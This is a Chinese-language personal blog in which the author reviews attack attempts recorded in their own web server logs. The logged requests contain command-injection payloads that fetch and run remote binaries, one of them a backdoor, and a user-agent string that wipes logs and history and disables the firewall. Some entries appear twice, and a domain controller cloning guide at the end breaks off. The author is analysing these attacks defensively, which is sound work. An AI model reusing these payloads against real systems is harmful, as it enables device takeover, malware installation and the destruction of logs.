2018年10月29日 星期一
2018年10月28日 星期日
2018年10月18日 星期四
從 Web Log 學習系統漏洞 26
來自捷克使用Linux系統的Router Webserver, 嘗試下載 avtech 這個程式(指令), 變更權限後再執行
77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"
下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm
內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行
經掃描結果確定為後門
77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"
下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm
內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行
經掃描結果確定為後門
2018年10月17日 星期三
2018年10月16日 星期二
從 Web Log 學習系統漏洞 25-1
這兩天埃及人對我網站很有興趣...
41.44.204.188 - - [15/Oct/2018:21:31:31 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
197.58.70.109 - - [15/Oct/2018:21:59:29 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.34.99.205 - - [16/Oct/2018:09:24:12 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.42.219.91 - - [16/Oct/2018:09:41:19 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:35 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:38 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:44 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.44.204.188 - - [15/Oct/2018:21:31:31 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
197.58.70.109 - - [15/Oct/2018:21:59:29 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.34.99.205 - - [16/Oct/2018:09:24:12 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.42.219.91 - - [16/Oct/2018:09:41:19 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:35 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:38 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
41.39.25.24 - - [16/Oct/2018:11:21:44 +0800] "GET /login.cgi?cli=aa ;wget" 400 226 "-" "-"
2018年10月15日 星期一
從 Web Log 學習系統漏洞 25
今天的東西很有趣, 雖然用跟之前同樣的方式入侵, 不過這次發現居然連HTTP_USER_AGENT也能附帶指令.
先從80.211.203.234下載程式bin, 執行後再刪除所有執行紀錄, 再幫你把防火牆給關了, 不過這個80.211.203.234的站似乎連不上啊
219.110.165.8 - - [15/Oct/2018:09:29:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
2018年10月12日 星期五
試作複製網域控制站(Cloning Domain Controller)
1. 開啟 ADDS/DC主機的 AD管理中心
2. 在本機項目中, 點擊 Domain Controllers組織單位w-studio.idv.tw
